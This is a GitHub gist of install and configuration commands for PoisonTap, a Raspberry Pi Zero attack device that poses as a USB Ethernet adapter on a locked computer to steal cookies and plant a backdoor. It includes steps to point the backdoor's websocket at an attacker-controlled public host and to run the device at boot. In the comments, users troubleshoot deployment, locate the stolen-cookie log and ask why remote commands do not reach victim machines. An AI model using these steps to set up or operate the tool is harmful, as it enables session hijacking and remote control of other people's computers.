Skip to content

Instantly share code, notes, and snippets.

@jgamblin
Created November 19, 2016 02:06
Show Gist options
  • Save jgamblin/459d7db3b4e8441cc210b35abb5d7181 to your computer and use it in GitHub Desktop.
Save jgamblin/459d7db3b4e8441cc210b35abb5d7181 to your computer and use it in GitHub Desktop.
PoisonTap Install Commands
##Server:
sudo apt-get update && apt-get upgrade
sudo apt-get install screen nodejs nodejs-legacy git npm
sudo npm install websocket
git clone https://github.com/samyk/poisontap
screen
sudo node backend_server.js
##piZero:
sudo apt-get update && apt-get upgrade
sudo apt-get -y install isc-dhcp-server dsniff screen nodejs git
git clone https://github.com/samyk/poisontap
Update ws://YOUR.DOMAIN:1337 in backdoor.html to your public IP
ws://poisontap.jgamblin.com:1337
#add this to /etc/network/interfaces:
auto usb0
allow-hotplug usb0
iface usb0 inet static
address 1.0.0.1
netmask 0.0.0.0
#Setup to run at boot:
sudo cp /home/pi/poisontap/pi_startup.sh /etc/init.d/ && sudo chmod +x /etc/init.d/pi_startup.sh
add this to /etc/rc.local right above exit 0:
/etc/init.d/pi_startup.sh &
#DHCP:
sudo cp -f dhcpd.conf /etc/dhcp/dhcpd.conf
add this to /etc/default/isc-dhcp-server:
INTERFACES="usb0"
@danthegoodman1
Copy link

Question: for the ws://YOUR.DOMAIN:1337 do you have to have something like poisontap.whatever.com:1337 or can you just use an external ip like ##.##.###.###:1337 kind of deal? Is the subdomain pointing to anything in particular? Or as long as it is all consistent across the pi and the server that a bare ip would be ok? (the ##.## stuff)

@ajdulion
Copy link

ajdulion commented Dec 1, 2016

hmm..

I setup my raspberry zero using the usb route (so no screen)

getting the following errors when running the startup

ln: failed to create symbolic link ‘configs/c.1/acm.usb0’: File exists
sh: echo: I/O error
sh: echo: I/O error
ln: failed to create symbolic link ‘configs/c.1/ecm.usb0’: File exists
ls: write error: Device or resource busy
ifup: interface usb0 already configured
SIOCADDRT: File exists

anyone knows if this is because I am setting up the device via usb ?

@danthegoodman1
Copy link

The thing that immediately jumps out to me is the "Device or resource busy" line. Unfortunately if the case is that it is because it is being used, then the only way to solve it would be to edit that file before it is inserted into the pi. the only way to stop the ONLY usb port is to not use it, but the pi does not have integrated wifi that you could ssh into. I am by no means an expert on this, but that is what jumps out to me. I have not run that part of the installation yet, so I do not know if I will run into it or not.

@danthegoodman1
Copy link

I am also wondering why this installation does not include anything about activating the g_eth. Like in this tutorial (found through the poisontap github) samyk/poisontap@068c283

@ajdulion
Copy link

ajdulion commented Dec 2, 2016

wel it seems to run, but now i have no clue where to find the cookies on my test setup this tool is missing some manual/tutorials i'm guessing..

@Stephen2929
Copy link

poisontap/poisontap.cookies.log

@danthegoodman1
Copy link

danthegoodman1 commented Dec 2, 2016

@Stephen2929 have you had success with the server side? (I finally got it working, the tutorial above is not very good, not to everyone: use the link I posted, and do part 2 before part 1) But when sending commands on the server, nothing is getting sent to the victim machine. I see that it was sent, and then on the screen that the backend is running on I see that it was requested. But when I send commands, like and alert command, nothing happens on the victim machine. Going through all of the logs I cannot see any evidence of anything being sent to the machine. Also, when looking at the network graph, samy's has lots of color. Mine is mostly gray however, and in the console I am getting 404 on almost all domain/poisontap links (I assume that is normal because those links don't actually exist. Any help would be greatly appreciated.

Edit: Update

@rinkunamaste
Copy link

I tried all steps describe in pi.txt but raspberry pi zero is not able to create a virtual Ethernet port on windows 7 and windows 10. anyone else had same problem and sorted out? i will appreciate for any response. thanks

@himuura
Copy link

himuura commented Dec 10, 2016

Same issue...followed all the pi.txt steps and still i havent got a new Ethernet device. Both on Windows 7,8.1 and 10. Perhaps some step missing?

@mkmxu
Copy link

mkmxu commented Dec 12, 2016

When I type "git clone https://github.com/samyk/poisontap"

I get this response

Cloning into 'poisontap'...
remote: Counting objects: 396, done.
remote: Compressing objects: 100% (15/15), done.
error: RPC failed; result=56, HTTP code = 200
fatal: The remote end hung up unexpectedly
fatal: early EOF
fatal: index-pack failed

is this something I've done or on github side? or what? Thank you in advance for your help.

@gabyavra
Copy link

gabyavra commented Dec 21, 2016

I monitor the /var/log/syslog and I see the DHCPDISCOVER and also the DHCPOFFER on the raspberry zero. I also monitor the traffic using wireshark on the victim computer, and only see the DHCPDISCOVER, therefore I'm stucked with 169.254.X.X IP address. Any ideea?

UPDATE: I made it work by reinstalling the base OS and NOT upgrading it with apt-get upgrade and BRANCH=next rpi-update. It seems that if I updated it, something went wrong, I don't know if the ethernet emulation or DHCP, since both seems to work fine at first preview. I think the ethernet emulation was to blame, since the ping between computer and raspberry didn't work, either I configured the computer with statical IP address!

@gersey2002
Copy link

does anyone have a tutorial on getting the back end server running I'm not having any luck with it

@eliddell1
Copy link

eliddell1 commented Mar 14, 2017

I too am getting this error on start up:

ln: failed to create symbolic link ‘configs/c.1/acm.usb0’: File exists
sh: echo: I/O error
sh: echo: I/O error
ln: failed to create symbolic link ‘configs/c.1/ecm.usb0’: File exists
ls: write error: Device or resource busy
ifup: interface usb0 already configured
SIOCADDRT: File exists

anyone knows if this is because I am setting up the device via usb ?

can someone please help @ajdulion how did you get this working?

@theCake75
Copy link

@eliddell1 @ajdulion i have exactly the same problem, can you help me please ?

@morpheuslord
Copy link

I am not able to get the headless operations working. The RNDIS drivers are not supported anyone have any idea how I can solve this?

image

This is what it looks like now.
This is the error

This device cannot start. (Code 10)

{Operation Failed}
The requested operation was unsuccessful.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment